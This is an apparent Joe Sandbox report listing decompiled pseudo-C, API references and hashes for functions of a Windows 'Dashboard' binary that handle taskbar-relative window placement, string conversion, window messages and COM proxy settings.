                                                                                                                    • Source File: 00000001.00000002.259436616.0000000001001000.00000020.00000001.01000000.00000004.sdmp, Offset: 01000000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.259432248.0000000001000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259455281.000000000101A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259460165.000000000101B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_1000000_Dashboard.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DirectRect$Element@$AdjustDesiredElement@2@Host@Int@@LoadNativeSize@UpdateUtagWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1809558269-0
                                                                                                                    • Opcode ID: d3e138a6f4332dea81d1944166ee624c3c0e8700dc19a9ac083cc37b1f3bb87a
                                                                                                                    • Instruction ID: 71f5b1d7fa40daee496e1b61813e65f8cd9f9a99bc4942fbb0048a46c1a82405
                                                                                                                    • Opcode Fuzzy Hash: d3e138a6f4332dea81d1944166ee624c3c0e8700dc19a9ac083cc37b1f3bb87a
                                                                                                                    • Instruction Fuzzy Hash: 8E112BB2600119AFE721EFA8CD84CBEB7ADEF88354B154569F946D7280CA75AD008B60
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 96%
                                                                                                                    			E010156A1(int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                    				intOrPtr _v8;
                                                                                                                    				intOrPtr _v12;
                                                                                                                    				int _v16;
                                                                                                                    				signed int _v20;
                                                                                                                    				intOrPtr _v24;
                                                                                                                    				intOrPtr _v28;
                                                                                                                    				char _v36;
                                                                                                                    				intOrPtr _v48;
                                                                                                                    				intOrPtr _v52;
                                                                                                                    				struct _AppBarData _v72;
                                                                                                                    				void* _t52;
                                                                                                                    				int _t66;
                                                                                                                    				intOrPtr _t72;
                                                                                                                    				signed int _t82;
                                                                                                                    				signed int _t85;
                                                                                                                    				signed int _t87;
                                                                                                                    				void* _t88;
                                                                                                                    				void* _t89;
                                                                                                                    				signed int _t96;
                                                                                                                    				int _t101;
                                                                                                                    				signed int* _t102;
                                                                                                                    
                                                                                                                    				_t102 = _a4;
                                                                                                                    				_t79 = 0;
                                                                                                                    				if(_t102 == 0) {
                                                                                                                    					return _t52;
                                                                                                                    				}
                                                                                                                    				_t82 = 8;
                                                                                                                    				memset( &(_v72.hWnd), 0, _t82 << 2);
                                                                                                                    				_v72.uEdge = _v72.uEdge | 0xffffffff;
                                                                                                                    				_v72.cbSize = 0x24;
                                                                                                                    				if(SHAppBarMessage(5,  &_v72) == 0) {
                                                                                                                    					L19:
                                                                                                                    					_v20 = _t79;
                                                                                                                    					_v16 = _t79;
                                                                                                                    					_v12 = _t79;
                                                                                                                    					_v8 = _t79;
                                                                                                                    					E0101567B( &_v20,  &_v36);
                                                                                                                    					asm("cdq");
                                                                                                                    					_t85 = _v28 - _a12 - _t96 >> 1;
                                                                                                                    					asm("cdq");
                                                                                                                    					_t66 = _v24 - _a8 - _t96 >> 1;
                                                                                                                    					 *_t102 = _t85;
                                                                                                                    					_t102[1] = _t66;
                                                                                                                    					if(_t85 < _t79) {
                                                                                                                    						_t85 = 0;
                                                                                                                    					}
                                                                                                                    					 *_t102 = _t85;
                                                                                                                    					if(_t66 < _t79) {
                                                                                                                    						_t66 = 0;
                                                                                                                    					}
                                                                                                                    					_t102[1] = _t66;
                                                                                                                    					goto L24;
                                                                                                                    				} else {
                                                                                                                    					_a4 = 0;
                                                                                                                    					if(_a16 != 0) {
                                                                                                                    						_a4 = GetSystemMetrics(2);
                                                                                                                    					}
                                                                                                                    					E0101567B( &(_v72.left),  &_v20);
                                                                                                                    					_t101 = _v16;
                                                                                                                    					_t96 = _v20;
                                                                                                                    					_t102[1] = _v8 - _a8;
                                                                                                                    					_t72 = _v12;
                                                                                                                    					if(_v72.uEdge == 0xffffffff) {
                                                                                                                    						if(_v48 - _v72.left.left < _t72 - _t96) {
                                                                                                                    							if(_v72.left.left <= _t96) {
                                                                                                                    								_v72.uEdge = _v72.uEdge & 0x00000000;
                                                                                                                    							} else {
                                                                                                                    								_v72.uEdge = 2;
                                                                                                                    							}
                                                                                                                    						} else {
                                                                                                                    							_v72.uEdge = (0 | _v52 - _t101 > 0x00000000) + (0 | _v52 - _t101 > 0x00000000) + 1;
                                                                                                                    						}
                                                                                                                    					}
                                                                                                                    					_t79 = 0;
                                                                                                                    					_t87 = _v72.uEdge;
                                                                                                                    					if(_t87 == 0) {
                                                                                                                    						 *_t102 = _t96;
                                                                                                                    						goto L18;
                                                                                                                    					} else {
                                                                                                                    						_t88 = _t87 - 1;
                                                                                                                    						if(_t88 == 0) {
                                                                                                                    							L14:
                                                                                                                    							 *_t102 = _t72 - _a4 - _a12;
                                                                                                                    							if(_v72.uEdge == 1) {
                                                                                                                    								_t102[1] = _t101;
                                                                                                                    							}
                                                                                                                    							L18:
                                                                                                                    							_t66 = IsRectEmpty( &(_v72.left));
                                                                                                                    							if(_t66 == 0) {
                                                                                                                    								L24:
                                                                                                                    								return _t66;
                                                                                                                    							}
                                                                                                                    							goto L19;
                                                                                                                    						}
                                                                                                                    						_t89 = _t88 - 1;
                                                                                                                    						if(_t89 == 0) {
                                                                                                                    							 *_t102 = _t72 - _a4 - _a12;
                                                                                                                    							goto L18;
                                                                                                                    						}
                                                                                                                    						if(_t89 != 1) {
                                                                                                                    							goto L19;
                                                                                                                    						}
                                                                                                                    						goto L14;
                                                                                                                    					}
                                                                                                                    				}
                                                                                                                    			}
























                                                                                                                    0x010156ab
                                                                                                                    0x010156ae
                                                                                                                    0x010156b2
                                                                                                                    0x010157d5
                                                                                                                    0x010157d5
                                                                                                                    0x010156bb
                                                                                                                    0x010156c1
                                                                                                                    0x010156c3
                                                                                                                    0x010156cd
                                                                                                                    0x010156dc
                                                                                                                    0x0101578a
                                                                                                                    0x01015792
                                                                                                                    0x01015795
                                                                                                                    0x01015798
                                                                                                                    0x0101579b
                                                                                                                    0x0101579e
                                                                                                                    0x010157a9
                                                                                                                    0x010157b4
                                                                                                                    0x010157b6
                                                                                                                    0x010157b9
                                                                                                                    0x010157bd
                                                                                                                    0x010157bf
                                                                                                                    0x010157c2
                                                                                                                    0x010157c4
                                                                                                                    0x010157c4
                                                                                                                    0x010157c8
                                                                                                                    0x010157ca
                                                                                                                    0x010157cc
                                                                                                                    0x010157cc
                                                                                                                    0x010157ce
                                                                                                                    0x00000000
                                                                                                                    0x010156e2
                                                                                                                    0x010156e5
                                                                                                                    0x010156e8
                                                                                                                    0x010156f2
                                                                                                                    0x010156f2
                                                                                                                    0x010156fd
                                                                                                                    0x0101570c
                                                                                                                    0x0101570f
                                                                                                                    0x01015712
                                                                                                                    0x01015715
                                                                                                                    0x01015718
                                                                                                                    0x01015726
                                                                                                                    0x0101573c
                                                                                                                    0x01015747
                                                                                                                    0x0101573e
                                                                                                                    0x0101573e
                                                                                                                    0x0101573e
                                                                                                                    0x01015728
                                                                                                                    0x01015734
                                                                                                                    0x01015734
                                                                                                                    0x01015726
                                                                                                                    0x0101574e
                                                                                                                    0x01015750
                                                                                                                    0x01015752
                                                                                                                    0x0101577a
                                                                                                                    0x00000000
                                                                                                                    0x01015754
                                                                                                                    0x01015754
                                                                                                                    0x01015755
                                                                                                                    0x0101575d
                                                                                                                    0x01015767
                                                                                                                    0x01015769
                                                                                                                    0x0101576b
                                                                                                                    0x0101576b
                                                                                                                    0x0101577c
                                                                                                                    0x01015780
                                                                                                                    0x01015788
                                                                                                                    0x010157d1
                                                                                                                    0x00000000
                                                                                                                    0x010157d1
                                                                                                                    0x00000000
                                                                                                                    0x01015788
                                                                                                                    0x01015757
                                                                                                                    0x01015758
                                                                                                                    0x01015776
                                                                                                                    0x00000000
                                                                                                                    0x01015776
                                                                                                                    0x0101575b
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0101575b
                                                                                                                    0x01015752

                                                                                                                    APIs
                                                                                                                    • SHAppBarMessage.SHELL32(00000005,?), ref: 010156D4
                                                                                                                    • GetSystemMetrics.USER32 ref: 010156EC
                                                                                                                    • IsRectEmpty.USER32(?), ref: 01015780
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.259436616.0000000001001000.00000020.00000001.01000000.00000004.sdmp, Offset: 01000000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.259432248.0000000001000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259455281.000000000101A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259460165.000000000101B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_1000000_Dashboard.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: EmptyMessageMetricsRectSystem
                                                                                                                    • String ID: $
                                                                                                                    • API String ID: 2292397665-3993045852
                                                                                                                    • Opcode ID: ab05f3a0025eb87d50b3fc758c4437df7dcce06cabbe2307c1029eec0a697a13
                                                                                                                    • Instruction ID: 4c4c7ab558addff8e75fb91731318ce0bdb061bc492359218a73d0da22669bd5
                                                                                                                    • Opcode Fuzzy Hash: ab05f3a0025eb87d50b3fc758c4437df7dcce06cabbe2307c1029eec0a697a13
                                                                                                                    • Instruction Fuzzy Hash: A3413C7190120AEFCF14CFA8E9C59AEBBF4FB89314F24852DE595EB284D734A544CB50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 79%
                                                                                                                    			E01006F15(signed int __eax, short** __ecx, char* _a4, int _a8) {
                                                                                                                    				int _v8;
                                                                                                                    				int _v12;
                                                                                                                    				signed int _t17;
                                                                                                                    				int _t34;
                                                                                                                    				void* _t37;
                                                                                                                    
                                                                                                                    				_t27 = __ecx;
                                                                                                                    				_t17 = __eax;
                                                                                                                    				_push(__ecx);
                                                                                                                    				_push(__ecx);
                                                                                                                    				_t25 = __ecx;
                                                                                                                    				if(_a4 != 0) {
                                                                                                                    					_t34 = lstrlenA(_a4) + 1;
                                                                                                                    					_v12 = _t34;
                                                                                                                    					E01006DD1(_t25, _t34,  &(_t25[1]), 0x80);
                                                                                                                    					_t17 = MultiByteToWideChar(_a8, 0, _a4, _t34,  *_t25, _t34);
                                                                                                                    					asm("sbb esi, esi");
                                                                                                                    					_t37 =  ~_t17 + 1;
                                                                                                                    					if(_t37 != 0) {
                                                                                                                    						_t17 = GetLastError();
                                                                                                                    						if(_t17 == 0x7a) {
                                                                                                                    							_v8 = MultiByteToWideChar(_a8, 0, _a4, _v12, 0, 0);
                                                                                                                    							E01006DD1(_t25, _v8,  &(_t25[1]), 0x80);
                                                                                                                    							_t17 = MultiByteToWideChar(_a8, 0, _a4, _v12,  *_t25, _v8);
                                                                                                                    							asm("sbb esi, esi");
                                                                                                                    							_t37 =  ~_t17 + 1;
                                                                                                                    						}
                                                                                                                    						if(_t37 != 0) {
                                                                                                                    							_t17 = E010068BB(_t27);
                                                                                                                    						}
                                                                                                                    					}
                                                                                                                    				} else {
                                                                                                                    					 *((intOrPtr*)(__ecx)) = 0;
                                                                                                                    				}
                                                                                                                    				return _t17;
                                                                                                                    			}








                                                                                                                    0x01006f15
                                                                                                                    0x01006f15
                                                                                                                    0x01006f1a
                                                                                                                    0x01006f1b
                                                                                                                    0x01006f23
                                                                                                                    0x01006f25
                                                                                                                    0x01006f43
                                                                                                                    0x01006f46
                                                                                                                    0x01006f49
                                                                                                                    0x01006f5f
                                                                                                                    0x01006f65
                                                                                                                    0x01006f67
                                                                                                                    0x01006f68
                                                                                                                    0x01006f6a
                                                                                                                    0x01006f73
                                                                                                                    0x01006f85
                                                                                                                    0x01006f95
                                                                                                                    0x01006fa9
                                                                                                                    0x01006faf
                                                                                                                    0x01006fb1
                                                                                                                    0x01006fb1
                                                                                                                    0x01006fb4
                                                                                                                    0x01006fb6
                                                                                                                    0x01006fb6
                                                                                                                    0x01006fb4
                                                                                                                    0x01006f27
                                                                                                                    0x01006f27
                                                                                                                    0x01006f27
                                                                                                                    0x01006fbf

                                                                                                                    APIs
                                                                                                                    • lstrlenA.KERNEL32(?), ref: 01006F32
                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,?,00000001), ref: 01006F5F
                                                                                                                    • GetLastError.KERNEL32(?,00000001), ref: 01006F6A
                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,?,00000001), ref: 01006F83
                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,?,?,?,00000001), ref: 01006FA9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.259436616.0000000001001000.00000020.00000001.01000000.00000004.sdmp, Offset: 01000000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.259432248.0000000001000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259455281.000000000101A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259460165.000000000101B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_1000000_Dashboard.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3322701435-0
                                                                                                                    • Opcode ID: 7792bc38fc12b54c15b8ff1acd53d2e74ddac52a1f7456f07dac181e9d35e7df
                                                                                                                    • Instruction ID: 4d3a4669911ef874adf8f587f61e9c25e1d8e1e6141688ddc47703c6cb7bf9f3
                                                                                                                    • Opcode Fuzzy Hash: 7792bc38fc12b54c15b8ff1acd53d2e74ddac52a1f7456f07dac181e9d35e7df
                                                                                                                    • Instruction Fuzzy Hash: 11117236400128BBDF236F95CC44DEFBE6EEF457A0F118155F9889A150C7728A60DBE0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 75%
                                                                                                                    			E01011E46(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                    				intOrPtr _t42;
                                                                                                                    				intOrPtr _t43;
                                                                                                                    				intOrPtr* _t44;
                                                                                                                    				void* _t45;
                                                                                                                    				signed int _t58;
                                                                                                                    				intOrPtr _t59;
                                                                                                                    				intOrPtr _t69;
                                                                                                                    				intOrPtr _t72;
                                                                                                                    				void* _t75;
                                                                                                                    				void* _t79;
                                                                                                                    
                                                                                                                    				_t63 = __ebx;
                                                                                                                    				_push(0x34);
                                                                                                                    				E0100880F(E01016434, __ebx, __edi, __esi);
                                                                                                                    				_t77 = __ecx;
                                                                                                                    				_t42 =  *((intOrPtr*)(_t79 + 8));
                                                                                                                    				_t75 = 1;
                                                                                                                    				if(_t42 == 0x10) {
                                                                                                                    					_t43 =  *0x101a004; // 0x101a004
                                                                                                                    					__eflags = _t43 - 0x101a004;
                                                                                                                    					if(_t43 != 0x101a004) {
                                                                                                                    						__eflags =  *(_t43 + 0x1c) & 0x00000008;
                                                                                                                    						if(( *(_t43 + 0x1c) & 0x00000008) != 0) {
                                                                                                                    							_t36 = _t43 + 0x14; // 0x65637845
                                                                                                                    							_t37 = _t43 + 0x10; // 0x6c744143
                                                                                                                    							E010049DE(_t43,  *_t37,  *_t36, 0x18, 0x1002308);
                                                                                                                    						}
                                                                                                                    					}
                                                                                                                    					_t44 = _t77 - 4;
                                                                                                                    					_t45 =  *((intOrPtr*)( *_t44 + 0x1c))(_t44);
                                                                                                                    					L23:
                                                                                                                    					_t75 = _t45;
                                                                                                                    					L24:
                                                                                                                    					return E010088FB(_t75);
                                                                                                                    				}
                                                                                                                    				if(_t42 == 0x15) {
                                                                                                                    					L18:
                                                                                                                    					E0100D009(_t63, _t79 - 0x14, _t75, _t77 + 0xfffffffc, __eflags);
                                                                                                                    					 *(_t79 - 4) = 0;
                                                                                                                    					__imp__?RMUpdateResourceSet@@YG_NPB_WK00@Z(L"hc", 0x8002, 0, 0, _t77 + 0xfffffffc);
                                                                                                                    					 *(_t79 - 4) =  *(_t79 - 4) | 0xffffffff;
                                                                                                                    					E0100EEC0(_t79 - 0x14);
                                                                                                                    					goto L24;
                                                                                                                    				}
                                                                                                                    				if(_t42 == 0x111) {
                                                                                                                    					_push(0);
                                                                                                                    					_push(0);
                                                                                                                    					_push(0);
                                                                                                                    					E0100C1BE(__ecx - 4,  *((intOrPtr*)(_t79 + 0x10)),  *(_t79 + 0xc) & 0x0000ffff,  *(_t79 + 0xc) >> 0x10, 0);
                                                                                                                    					goto L24;
                                                                                                                    				}
                                                                                                                    				if(_t42 == 0x232) {
                                                                                                                    					__eflags =  *((char*)(__ecx + 0x40));
                                                                                                                    					if( *((char*)(__ecx + 0x40)) != 0) {
                                                                                                                    						goto L24;
                                                                                                                    					}
                                                                                                                    					__imp__?GetHWND@NativeHWNDHost@DirectUI@@QAEPAUHWND__@@XZ();
                                                                                                                    					_t58 = GetWindowPlacement(_t79 - 0x40, _t79 - 0x40);
                                                                                                                    					__eflags = _t58;
                                                                                                                    					if(_t58 != 0) {
                                                                                                                    						_t72 =  *((intOrPtr*)(_t77 + 0x50));
                                                                                                                    						__eflags = _t72 -  *((intOrPtr*)(_t79 - 0x24));
                                                                                                                    						_t69 =  *((intOrPtr*)(_t79 - 0x20));
                                                                                                                    						if(_t72 !=  *((intOrPtr*)(_t79 - 0x24))) {
                                                                                                                    							L13:
                                                                                                                    							_t59 =  *0x101a004; // 0x101a004
                                                                                                                    							__eflags = _t59 - 0x101a004;
                                                                                                                    							if(_t59 != 0x101a004) {
                                                                                                                    								__eflags =  *(_t59 + 0x1c) & 0x00000008;
                                                                                                                    								if(( *(_t59 + 0x1c) & 0x00000008) != 0) {
                                                                                                                    									_t17 = _t59 + 0x14; // 0x65637845
                                                                                                                    									_t18 = _t59 + 0x10; // 0x6c744143
                                                                                                                    									E0100C03A( *_t18,  *_t17, 0x19, 0x1002308, _t72,  *((intOrPtr*)(_t77 + 0x54)),  *((intOrPtr*)(_t79 - 0x24)), _t69);
                                                                                                                    									_t69 =  *((intOrPtr*)(_t79 - 0x20));
                                                                                                                    								}
                                                                                                                    							}
                                                                                                                    							 *((char*)(_t77 + 0x40)) = 1;
                                                                                                                    							 *((intOrPtr*)(_t77 + 0x50)) =  *((intOrPtr*)(_t79 - 0x24));
                                                                                                                    							 *((intOrPtr*)(_t77 + 0x54)) = _t69;
                                                                                                                    							goto L24;
                                                                                                                    						}
                                                                                                                    						__eflags =  *((intOrPtr*)(_t77 + 0x54)) - _t69;
                                                                                                                    						if( *((intOrPtr*)(_t77 + 0x54)) == _t69) {
                                                                                                                    							goto L24;
                                                                                                                    						}
                                                                                                                    						goto L13;
                                                                                                                    					}
                                                                                                                    					_t45 = E0100CC3F();
                                                                                                                    					goto L23;
                                                                                                                    				}
                                                                                                                    				if(_t42 == 0x31a) {
                                                                                                                    					goto L18;
                                                                                                                    				}
                                                                                                                    				if(_t42 == 0xbd1) {
                                                                                                                    					E01011B9A(__ebx, __ecx - 4, __edx, 1, __ecx, __eflags);
                                                                                                                    					goto L24;
                                                                                                                    				} else {
                                                                                                                    					_t45 = E01012579(__ecx, _t42,  *(_t79 + 0xc),  *((intOrPtr*)(_t79 + 0x10)),  *((intOrPtr*)(_t79 + 0x14)));
                                                                                                                    					goto L23;
                                                                                                                    				}
                                                                                                                    			}













                                                                                                                    0x01011e46
                                                                                                                    0x01011e46
                                                                                                                    0x01011e4d
                                                                                                                    0x01011e52
                                                                                                                    0x01011e54
                                                                                                                    0x01011e59
                                                                                                                    0x01011e5d
                                                                                                                    0x01011f7c
                                                                                                                    0x01011f81
                                                                                                                    0x01011f86
                                                                                                                    0x01011f88
                                                                                                                    0x01011f8c
                                                                                                                    0x01011f95
                                                                                                                    0x01011f98
                                                                                                                    0x01011f9b
                                                                                                                    0x01011f9b
                                                                                                                    0x01011f8c
                                                                                                                    0x01011fa0
                                                                                                                    0x01011fa6
                                                                                                                    0x01011fa9
                                                                                                                    0x01011fa9
                                                                                                                    0x01011fab
                                                                                                                    0x01011fb2
                                                                                                                    0x01011fb2
                                                                                                                    0x01011e66
                                                                                                                    0x01011f4b
                                                                                                                    0x01011f52
                                                                                                                    0x01011f65
                                                                                                                    0x01011f68
                                                                                                                    0x01011f6e
                                                                                                                    0x01011f75
                                                                                                                    0x00000000
                                                                                                                    0x01011f75
                                                                                                                    0x01011e71
                                                                                                                    0x01011f2e
                                                                                                                    0x01011f2f
                                                                                                                    0x01011f30
                                                                                                                    0x01011f44
                                                                                                                    0x00000000
                                                                                                                    0x01011f44
                                                                                                                    0x01011e7c
                                                                                                                    0x01011eb1
                                                                                                                    0x01011eb5
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x01011ebf
                                                                                                                    0x01011ec6
                                                                                                                    0x01011ecc
                                                                                                                    0x01011ece
                                                                                                                    0x01011eda
                                                                                                                    0x01011edd
                                                                                                                    0x01011ee0
                                                                                                                    0x01011ee3
                                                                                                                    0x01011eee
                                                                                                                    0x01011eee
                                                                                                                    0x01011ef3
                                                                                                                    0x01011ef8
                                                                                                                    0x01011efa
                                                                                                                    0x01011efe
                                                                                                                    0x01011f0f
                                                                                                                    0x01011f12
                                                                                                                    0x01011f15
                                                                                                                    0x01011f1a
                                                                                                                    0x01011f1a
                                                                                                                    0x01011efe
                                                                                                                    0x01011f20
                                                                                                                    0x01011f24
                                                                                                                    0x01011f27
                                                                                                                    0x00000000
                                                                                                                    0x01011f27
                                                                                                                    0x01011ee5
                                                                                                                    0x01011ee8
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x01011ee8
                                                                                                                    0x01011ed0
                                                                                                                    0x00000000
                                                                                                                    0x01011ed0
                                                                                                                    0x01011e83
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x01011e8e
                                                                                                                    0x01011ea7
                                                                                                                    0x00000000
                                                                                                                    0x01011e90
                                                                                                                    0x01011e9a
                                                                                                                    0x00000000
                                                                                                                    0x01011e9a

                                                                                                                    APIs
                                                                                                                    • __EH_prolog3.LIBCMT ref: 01011E4D
                                                                                                                    • ?GetHWND@NativeHWNDHost@DirectUI@@QAEPAUHWND__@@XZ.UXCORE(00000000), ref: 01011EBF
                                                                                                                    • GetWindowPlacement.USER32(00000000), ref: 01011EC6
                                                                                                                      • Part of subcall function 01012579: ?OnMessage@NativeHWNDHost@DirectUI@@UAEJIIJAAJ@Z.UXCORE(?,?,?,?), ref: 010125A2
                                                                                                                    • ?RMUpdateResourceSet@@YG_NPB_WK00@Z.UXCORE(01001AD0,00008002,00000000,00000000,?,00000034), ref: 01011F68
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.259436616.0000000001001000.00000020.00000001.01000000.00000004.sdmp, Offset: 01000000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.259432248.0000000001000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259455281.000000000101A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259460165.000000000101B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_1000000_Dashboard.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DirectHost@Native$D__@@H_prolog3K00@Message@PlacementResourceSet@@UpdateWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 315737454-0
                                                                                                                    • Opcode ID: 0717c8a198e9a8660e710eff7bc540df8b7ce624521564a8d82b9d1c2acfc164
                                                                                                                    • Instruction ID: 9d7d88f9932502133a2307076172d7e1aac97a1b4a88e38512fd186e791fb1cb
                                                                                                                    • Opcode Fuzzy Hash: 0717c8a198e9a8660e710eff7bc540df8b7ce624521564a8d82b9d1c2acfc164
                                                                                                                    • Instruction Fuzzy Hash: 71418D30900249AFEB6ADBA8D944AAE7BF5BF14300F104899FAC1D71A9C77DD901CB10
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 44%
                                                                                                                    			E0100998A(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                    				signed int _t42;
                                                                                                                    				intOrPtr* _t43;
                                                                                                                    				intOrPtr* _t44;
                                                                                                                    				intOrPtr* _t49;
                                                                                                                    				signed int _t50;
                                                                                                                    				signed int _t52;
                                                                                                                    				signed int _t54;
                                                                                                                    				void* _t65;
                                                                                                                    
                                                                                                                    				E0100880F(E01015D38, __ebx, __edi, __esi);
                                                                                                                    				 *(_t65 - 0x24) =  *(_t65 - 0x24) | 0xffffffff;
                                                                                                                    				 *(_t65 - 0x20) =  *(_t65 - 0x20) | 0xffffffff;
                                                                                                                    				 *(_t65 - 0x1c) =  *(_t65 - 0x1c) | 0xffffffff;
                                                                                                                    				_t42 = _t65 - 0x24;
                                                                                                                    				 *(_t65 - 0x18) = 0x800;
                                                                                                                    				__imp__CoQueryProxyBlanket( *((intOrPtr*)(_t65 + 8)), _t42, _t65 - 0x20, _t65 - 0x1c, 0, 0, 0, _t65 - 0x18, 0x18);
                                                                                                                    				_t64 = _t42;
                                                                                                                    				 *(_t65 - 0x14) = 0;
                                                                                                                    				 *(_t65 - 4) = 0;
                                                                                                                    				if(_t64 >= 0) {
                                                                                                                    					_t54 = _t65 - 0x14;
                                                                                                                    					__imp__CoCopyProxy( *((intOrPtr*)(_t65 + 8)), _t54);
                                                                                                                    					_t64 = _t54;
                                                                                                                    				}
                                                                                                                    				 *((intOrPtr*)(_t65 - 0x10)) = 0;
                                                                                                                    				 *(_t65 - 4) = 1;
                                                                                                                    				if(_t64 >= 0) {
                                                                                                                    					_t49 =  *(_t65 - 0x14);
                                                                                                                    					_t50 =  *((intOrPtr*)( *_t49))(_t49, 0x1001e5c, _t65 - 0x10);
                                                                                                                    					_t64 = _t50;
                                                                                                                    					if(_t50 >= 0) {
                                                                                                                    						_t52 =  *(_t65 - 0x18) | 0x00000040;
                                                                                                                    						__imp__CoSetProxyBlanket( *((intOrPtr*)(_t65 - 0x10)),  *(_t65 - 0x24),  *(_t65 - 0x20),  *(_t65 - 0x1c),  *((intOrPtr*)(_t65 + 0xc)),  *((intOrPtr*)(_t65 + 0x10)), 0, _t52);
                                                                                                                    						_t64 = _t52;
                                                                                                                    						if(_t52 >= 0) {
                                                                                                                    							_t64 = E0100922D(_t65 - 0x10,  *((intOrPtr*)(_t65 + 0x14)));
                                                                                                                    						}
                                                                                                                    					}
                                                                                                                    				}
                                                                                                                    				_t43 =  *((intOrPtr*)(_t65 - 0x10));
                                                                                                                    				 *(_t65 - 4) = 0;
                                                                                                                    				if(_t43 != 0) {
                                                                                                                    					 *((intOrPtr*)( *_t43 + 8))(_t43);
                                                                                                                    				}
                                                                                                                    				_t44 =  *(_t65 - 0x14);
                                                                                                                    				 *(_t65 - 4) =  *(_t65 - 4) | 0xffffffff;
                                                                                                                    				if(_t44 != 0) {
                                                                                                                    					 *((intOrPtr*)( *_t44 + 8))(_t44);
                                                                                                                    				}
                                                                                                                    				return E010088FB(_t64);
                                                                                                                    			}











                                                                                                                    0x01009991
                                                                                                                    0x01009996
                                                                                                                    0x0100999a
                                                                                                                    0x0100999e
                                                                                                                    0x010099b3
                                                                                                                    0x010099ba
                                                                                                                    0x010099c1
                                                                                                                    0x010099c7
                                                                                                                    0x010099c9
                                                                                                                    0x010099ce
                                                                                                                    0x010099d1
                                                                                                                    0x010099d3
                                                                                                                    0x010099da
                                                                                                                    0x010099e0
                                                                                                                    0x010099e0
                                                                                                                    0x010099e2
                                                                                                                    0x010099e7
                                                                                                                    0x010099eb
                                                                                                                    0x010099ed
                                                                                                                    0x010099fc
                                                                                                                    0x010099fe
                                                                                                                    0x01009a02
                                                                                                                    0x01009a07
                                                                                                                    0x01009a1e
                                                                                                                    0x01009a24
                                                                                                                    0x01009a28
                                                                                                                    0x01009a35
                                                                                                                    0x01009a35
                                                                                                                    0x01009a28
                                                                                                                    0x01009a02
                                                                                                                    0x01009a37
                                                                                                                    0x01009a3c
                                                                                                                    0x01009a3f
                                                                                                                    0x01009a44
                                                                                                                    0x01009a44
                                                                                                                    0x01009a47
                                                                                                                    0x01009a4a
                                                                                                                    0x01009a50
                                                                                                                    0x01009a55
                                                                                                                    0x01009a55
                                                                                                                    0x01009a5f

                                                                                                                    APIs
                                                                                                                    • __EH_prolog3.LIBCMT ref: 01009991
                                                                                                                    • CoQueryProxyBlanket.OLE32(?,000000FF,000000FF,000000FF,00000000,00000000,00000000,?), ref: 010099C1
                                                                                                                    • CoCopyProxy.OLE32(?,?,?,?,?,?,?,?,?,?,?,00000018), ref: 010099DA
                                                                                                                    • CoSetProxyBlanket.OLE32(?,000000FF,000000FF,000000FF,?,?,00000000,00000800), ref: 01009A1E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.259436616.0000000001001000.00000020.00000001.01000000.00000004.sdmp, Offset: 01000000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.259432248.0000000001000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259455281.000000000101A000.00000004.00000001.01000000.00000004.sdmpDownload File
